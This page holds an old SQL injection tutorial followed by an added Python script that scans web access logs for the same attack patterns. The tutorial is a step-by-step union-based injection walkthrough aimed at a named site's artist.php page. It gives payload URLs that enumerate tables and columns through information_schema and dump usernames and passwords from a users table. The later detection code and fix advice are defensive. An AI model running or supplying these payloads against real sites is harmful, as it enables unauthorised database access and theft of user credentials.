SQL Injection Tutorial by Ralphmigcute From
Vulnerability
SQL injection will work only if the site is vulnerable to SQL errors.
Example: http://www.site.org/artist.php?id=74 = vulnerable.
Why? Because if you put in the end of this link it will show an error:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bmocaorg/public_html/artist.php on line 12.
Union!
NOTE: You must use -- or /* at the end of the last number.
To find out which number we will change, we use union.
You must put a - before the id value:
http://www.site.org/artist.php?id=-74
Then you must use union with the number of columns:
http://www.site.org/artist.php?id=-74 union all select 1,2,3,4--
Example: 2 3 4
The numbers will then appear on the site. When a number shows up, change that number to version().
If the version is 5 and up, go to the next page. If the version is 4 and down, skip the next page.
SQL Version 5
http://www.bmoca.org/artist.php?id=-74 union all select 1,version(),3,4--
To check the tables:
http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables--
The list of tables will be shown on the site. If only one table is shown, use limit:
http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables limit 1,1--
Continue incrementing until you find the one you are looking for.
Once you have the table you want, you need to check its columns:
Change table_name to column_name.
Change information_schema.tables to information_schema.columns.
Then remove limit 1,1--
Then add where table_name= followed by the table name that you got from the table list, but you must hex it.
http://home2.paulschou.net/tools/xlate/
This tool converts a string to hex. If you choose users, the hex is 7573657273. Before you input the hex you must put 0x at the start, so 0x7573657273.
http://www.bmoca.org/artist.php?id=-74 union all select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273--
Then, once you have chosen the column you want, do this to get the information:
http://www.bmoca.org/artist.php?id=-74 union all select 1,concat_ws(0x3a,username,password),3,4 from users
Change username, password to the columns that you want, then change users to the table you want. There you go: you have the user's username and password.
Credits to ralphmigcute
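To find the requests described in this tutorial in a web server access log, the following added example (not part of the original tutorial) flags a numeric id parameter that carries anything other than digits and tags the union / information_schema patterns shown above. The log lines are constructed, and the rule that id is always a positive integer is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /artist.php?id=74 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /artist.php?id=-74%20union%20all%20select%201,2,3,4-- HTTP/1.1" 200 4980
203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /artist.php?id=-74+union+all+select+1,table_name,3,4+from+information_schema.tables+limit+1,1-- HTTP/1.1" 200 5011
203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /artist.php?id=-74+union+all+select+1,column_name,3,4+from+information_schema.columns+where+table_name=0x7573657273-- HTTP/1.1" 200 5044
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /artist.php?id=-74+union+all+select+1,concat_ws(0x3a,username,password),3,4+from+users HTTP/1.1" 200 5300
198.51.100.7 - - [10/Oct/2023:14:02:00 +0000] "GET /news.php?title=student+union+news HTTP/1.1" 200 2210
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "hex-literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "comment-terminator": re.compile(r"(?:--|/\*)\s*$"),
}

def scan_line(line):
    """Return the list of rule tags raised by one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    tags = []
    # parse_qsl URL-decodes %20 and + so the rules see the text the database would see
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            tags.append("non-integer-" + name)
        tags += [tag for tag, rx in RULES.items() if rx.search(value)]
    return tags

def scan(log_text):
    """Map 1-based line number -> tags, for lines that raised at least one tag."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = scan_line(line)
        if tags:
            hits[n] = tags
    return hits

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(tags)}")
```

Detection complements the fix rather than replacing it: binding id as an integer parameter in the query removes the injection point.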